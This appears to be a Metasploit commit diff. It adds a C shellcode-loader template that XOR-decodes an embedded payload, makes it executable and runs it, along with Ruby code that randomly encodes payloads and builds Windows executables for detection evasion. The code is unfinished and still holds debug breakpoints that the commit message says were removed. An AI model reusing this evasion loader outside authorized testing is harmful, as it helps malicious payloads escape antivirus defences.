Adds template with more randomized execution, removes debug breakpoints

Author: msutovsky-r7

.c

@@ -1,11 +1,32 @@
 #include <Windows.h>
 
 #define SCSIZE <%= payload_length %>
+
 char bPayload[SCSIZE] = "<%= payload %>";
 
+char GetKey()
+{
+	char hardcoded = bPayload[0];
+	for (int i = 0; i <= 255; i++)
+	{
+		char res = i ^ hardcoded;
+                if (res == (char)<%= "0x%02x"% control_byte %>)
+			return (char)i;
+	}
+}
+
 void main() {
 	DWORD dwOldProtect;
+	char* payload_fnc = NULL;
+	char key = GetKey();
+
+	for (int i = 0; i < SCSIZE; i++)
+	{
+		bPayload[i] = bPayload[i] ^ key;
+        }
+        payload_fnc = bPayload + 1;
 	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
-	(*(void (*)()) bPayload)();
+	(*(void (*)()) payload_fnc)();
 	return;
 }
+

data/templates/template_x64_windows.erb

@@ -0,0 +1,81 @@
+require 'metasm'
+require 'pry'
+require 'pry-byebug'
+
+module Metasploit
+  module Framework
+    module Compiler
+
+      class Custom
+
+        DOS_STUB = (
+          "\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21" \
+          "This program cannot be run in DOS mode.\r\r\n$\x00\x00\x00\x00\x00\x00"
+        ).b.freeze
+
+        RICH_HEADER = ("\x7E\x13\x87\xAA\x3A\x72\xE9\xF9\x3A\x72\xE9\xF9\x3A\x72\xE9\xF9\x33\x0A\x7A\xF9\x30\x72\xE9\xF9\xF1\x1D\xE8\xF8\x38\x72\xE9\xF9\xF1\x1D\xEC\xF8\x2B\x72\xE9\xF9\xF1\x1D\xED\xF8\x30\x72\xE9\xF9\xF1\x1D\xEA\xF8\x39\x72\xE9\xF9\x61\x1A\xE8\xF8\x3F\x72\xE9\xF9\x3A\x72\xE8\xF9\x0A\x72\xE9\xF9\xBC\x02\xE0\xF8\x3B\x72\xE9\xF9\xBC\x02\x16\xF9\x3B\x72\xE9\xF9\xBC\x02\xEB\xF8\x3B\x72\xE9\xF9\x52\x69\x63\x68\x3A\x72\xE9\xF9\x00\x00\x00\x00\x00\x00\x00\x00").b.freeze
+        
+        COMMON_OFFSETS = [0x40, 0x80].freeze
+        
+        def DOSHeader(pe_entry=nil)
+          e_lfanew = pe_entry || COMMON_OFFSETS.sample
+          dos_header = [
+            "MZ".b, # e_magic
+            "\x00\x00".b, # e_cblp
+            "\x00\x00".b, # e_cp
+            "\x00\x00".b, # e_crlc
+            "\x00\x00".b, # e_cparhdr
+            "\x00\x00".b, # e_minalloc
+            "\x00\x00".b, # e_maxalloc
+            "\x00\x00".b, # e_ss
+            "\x00\x00".b, # e_sp
+            "\x00\x00".b, # e_csum
+            "\x00\x00".b, # e_ip
+            "\x00\x00".b, # e_cs
+            "\x40\x00".b, # e_lfarlc (offset to the DOS stub)
+            [e_lfanew].pack('V') # e_lfanew (offset to the PE header)
+          ].join
+
+          dos_header + DOS_STUB
+        end
+        
+        def RichHeader
+          RICH_HEADER
+        end
+        
+        def OptionalHeader
+        
+        end
+
+        def NTHeader(numberOfSections=1)
+          optionalHeader = OptionalHeader()
+          sizeOfOptionalHeader = optionalHeader.length
+          [ 
+            # DWORD Signature
+            "PE\0\0".b, # Signature
+            # IMAGE_FILE_HEADER FileHeader
+            "\x64\x86".b, # Machine (0x14c for x86)
+            [numberOfSections].pack('v'), # NumberOfSections
+            "\x19\x5e\x42\x2a".b, # TimeDateStamp - TODO: randomize
+            "\x00\x00\x00\x00".b, # PointerToSymbolTable
+            "\x00\x00\x00\x00".b, # NumberOfSymbols
+            [sizeOfOptionalHeader].pack('v'), # SizeOfOptionalHeader
+            "\x02\x01".b # Characteristics (0x102 for executable) - TODO: randomize
+            # IMAGE_OPTIONAL_HEADER OptionalHeader
+            optionalHeader
+          ].join
+        end
+
+        def self.compile_c(c_template, type=:exe, cpu=Metasm::Ia32.new)
+          
+          binding.pry
+
+          raise NotImplementedError, "Other type than :exe is not supported." unless type == :exe
+          
+          
+        end
+
+      end
+    end
+  end
+end

lib/metasploit/framework/compiler/custom.rb

@@ -1,8 +1,5 @@
 # -*- coding: binary -*-
 
-require 'pry'
-require 'pry-byebug'
-
 module Msf
 module Simple
 
@@ -40,7 +37,6 @@ module Payload
   #   ArgumentParseError => Options were supplied improperly
   #
   def self.generate_simple(payload, opts, &block)
-    binding.pry
     # Clone the module to prevent changes to the original instance
     payload = payload.replicant
     Msf::Simple::Framework.simplify_module(payload)

lib/msf/base/simple/payload.rb

@@ -421,7 +421,11 @@ def encoded_exe(opts={})
         :template => emod.datastore['EXE::Template'],
         :inject => emod.datastore['EXE::Inject'],
         :fallback => emod.datastore['EXE::FallBack'],
-        :sub_method => emod.datastore['EXE::OldMethod']
+        :sub_method => emod.datastore['EXE::OldMethod'],
+        :dynamic_template_enabled => emod.datastore['EXE::Template::Dynamic::Enabled'],
+        :dynamic_template_obfluscation => emod.datastore['EXE::Template::Dynamic::Obfluscation'],
+        :dynamic_template_customtemplate => emod.datastore['EXE::Template::Dynamic::CustomTemplate'],
+        :dynamic_template_compiler => emod.datastore['EXE::Template::Dynamic::Compiler']
       })
       # Prefer the target's platform/architecture information, but use
       # the exploit module's if no target specific information exists.

lib/msf/core/encoded_payload.rb

@@ -27,10 +27,6 @@ def initialize(info = {})
         OptPath.new('MSI::Path',     [false, 'The directory in which to look for the msi template']),
         OptPath.new('MSI::Template', [false, 'The msi template file name']),
         OptBool.new('MSI::UAC',      [false, 'Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)']),
-        OptBool.new('EXE::Obfuscation::Enabled', [false, 'Use JIT obfuscation when generating the executable', false]),
-        OptPath.new('EXE::Obfuscation::Template', [false, 'The JIT obfuscation template file name. This should be a C file that will be compiled with the payload embedded in it.']),
-        OptPath.new('EXE::Obfuscation::Path', [false, 'The directory in which to look for the JIT obfuscation template']),
-        OptEnum.new('EXE::Obfuscation::Compiler', [true, 'The compiler to use for JIT obfuscation', 'metasm',['mingw', 'metasm']])
       ], self.class)
   end
 
@@ -188,7 +184,11 @@ def exe_init_options(opts)
         :template => datastore['EXE::Template'],
         :inject => datastore['EXE::Inject'],
         :fallback => datastore['EXE::FallBack'],
-        :sub_method => false
+        :sub_method => false,
+        :dynamic_template_enabled => datastore['EXE::Template::Dynamic::Enabled'],
+        :dynamic_template_obfluscation => datastore['EXE::Template::Dynamic::Obfluscation'],
+        :dynamic_template_customtemplate => datastore['EXE::Template::Dynamic::CustomTemplate'],
+        :dynamic_template_compiler => datastore['EXE::Template::Dynamic::Compiler']
       })
 
     # NOTE: If code and platform/arch are supplied, we use those values and skip initialization.

lib/msf/core/exploit/exe.rb

@@ -150,7 +150,11 @@ def initialize(info = {})
       register_advanced_options(
         [
           OptString.new('WORKSPACE', [ false, "Specify the workspace for this module" ]),
-          OptBool.new('VERBOSE',     [ false, 'Enable detailed status messages', false ])
+          OptBool.new('VERBOSE',     [ false, 'Enable detailed status messages', false ]),
+          OptBool.new('EXE::Template::Dynamic::Enabled', [false, 'Use dynamic template when generating the executable', false]),
+          OptPath.new('EXE::Template::Dynamic::CustomTemplate', [false, 'Use custom template when generating the executable']),
+          OptBool.new('EXE::Template::Dynamic::Obfluscation', [false, 'Use JIT obfuscation when generating the executable', false]),
+          OptEnum.new('EXE::Template::Dynamic::Compiler', [false, 'The compiler to use for JIT obfuscation', 'metasm',['mingw', 'metasm', 'msfcompile']])
         ], Msf::Module)
 
     end

lib/msf/core/module.rb

@@ -0,0 +1,44 @@
+require 'erb'
+require 'metasploit/framework/compiler/mingw'
+require 'metasploit/framework/compiler/windows'
+require 'metasploit/framework/compiler/custom'
+require 'pry'
+require 'pry-byebug'
+
+module Msf::Obfluscation::ExeTemplate
+  
+  def self.exe_template_compile(framework, code, opts)
+    
+    binding.pry 
+    
+    template_path = framework.datastore['EXE::Template::Dynamic::CustomTemplate']
+    template_path ||= File.join(Msf::Config.data_directory, 'templates','template_x64_windows.erb')
+    
+    key = rand(256)
+    control_byte = rand(256)
+    
+    code.prepend(control_byte.chr)
+
+    payload_length = code.bytesize
+
+    payload = code.bytes.map { |b| "\\x%02x" % (b ^ key) }.join
+    encoded_first_byte = key ^ control_byte
+
+    template = ERB.new(File.read(template_path))
+    source_c = template.result(binding)
+
+#    if framework.datastore['exe::template::dynamic::obfluscation']
+
+   
+    case framework.datastore['EXE::Template::Dynamic::Compiler']
+    when 'metasm'
+      return Metasploit::Framework::Compiler::Windows.compile_c(source_c, :exe,Metasm::X86_64.new)
+    when 'msfcompile'
+      return Metasploit::Framework::Compiler::Custom.compile_c(source_c, :exe)
+    else
+      raise "Unknown compiler: #{opts['EXE::Template::Dynamic::Compiler']}"
+    end
+
+  end
+
+end

lib/msf/core/obfluscation/exe_template.rb

@@ -1,6 +1,4 @@
 # -*- coding: binary -*-
-require 'pry'
-require 'pry-byebug'
 
 module Msf::Util::EXE
   include Msf::Util::EXE::Common
@@ -104,7 +102,6 @@ def to_executable(framework, arch, plat, code = '', fmt='', opts = {})
     def to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
       # For backwards compatibility with the way this gets called when
       # generating from Msf::Simple::Payload.generate_simple
-      binding.pry
       if arch.is_a? Array
         output = nil
         arch.each do |a|